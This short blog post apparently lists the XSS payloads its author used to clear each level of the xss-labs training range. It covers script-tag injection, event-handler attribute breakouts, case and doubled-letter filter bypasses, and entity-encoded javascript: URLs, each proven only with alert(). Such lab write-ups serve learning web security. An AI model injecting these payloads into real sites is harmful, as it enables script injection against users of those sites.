xss-labs过关payload

<script>alert('xss')</script> 

"><script>alert('xss')</script>//

?keyword='onfocus=javascript:alert('xss') > //&submit=搜索

"onclick="alert(/xss/)

"><a href='javascript:alert(/xss/)'>

" Onmouseover="alert(/xss/)

" oONnmouseover="alert(/xss/)

javasc&#82;ipt:alert(/xss/)

 

javasc&#82;ipt:alert('http://xss')

?keyword=<script>alert('xss')</script>&t_sort=" type="text" onclick="alert('xss')

 

posted @ 2021-12-16 17:42  sunwu57  阅读(34)  评论(0)    收藏  举报